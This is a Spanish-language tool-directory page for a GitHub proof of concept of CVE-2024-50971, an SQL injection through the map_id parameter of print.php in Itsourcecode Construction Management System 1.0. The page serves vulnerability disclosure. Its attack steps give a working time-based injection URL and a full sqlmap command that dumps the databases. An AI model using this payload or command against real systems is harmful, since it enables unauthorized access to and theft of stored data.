Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-50971 — Prueba de concepto para CVE-2024-50971, una vulnerabilidad de inyección SQL en Itsourcecode Construction Management System 1.0, con pasos de explotación y comandos de SQLMap. | Kitploit
Herramientas/GitHubGitHub/akhlak2511/cve-2024-50971
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónSeguridad de Bases de Datos
GitHubakhlak2511/cve-2024-50971

CVE-2024-50971

Prueba de concepto para CVE-2024-50971, una vulnerabilidad de inyección SQL en Itsourcecode Construction Management System 1.0, con pasos de explotación y comandos de SQLMap.

Ver Repositorio
59hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-50971

Descripción

Una vulnerabilidad de inyección SQL en print.php de Itsourcecode Construction Management System 1.0 permite a atacantes remotos ejecutar comandos SQL arbitrarios a través del parámetro map_id.

Tipo de Vulnerabilidad

Inyección SQL

Proveedor del Producto

Itsourcecode

Código base del producto afectado:

https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0

Componente afectado:

El sistema de gestión de construcción Itsourcecode v1.0 es vulnerable a inyección SQL a través del parámetro map_id en la página print.php.

Vectores de Ataque:

  1. Configure la aplicación localmente, registre una cuenta e inicie sesión con las credenciales de administrador como admin:admin
  2. Navegue a la siguiente URL en su navegador: http://localhost/monitoring_system/print.php?map_id=67
  3. Inyecte la carga útil SQL: Modifique el parámetro map_id en la URL para incluir una carga útil de inyección SQL basada en tiempo. http://localhost/monitoring_system/print.php?map_id=67'+AND+(SELECT+1386+FROM+(SELECT(SLEEP(15)))LhJj)--+byxm
  4. Observe la respuesta de la aplicación: La página debería tardar notablemente más (15 segundos) en cargarse si la inyección es exitosa, confirmando que el parámetro map_id es vulnerable a inyección SQL.
  5. Ahora use la herramienta SQLMap para una mayor explotación y volcado de bases de datos usando el siguiente comando: sqlmap.py -u http://localhost/monitoring_system/print.php?map_id=67 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast

Referencia:

  1. https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
  2. https://owasp.org/www-community/attacks/SQL_Injection
Descargar herramienta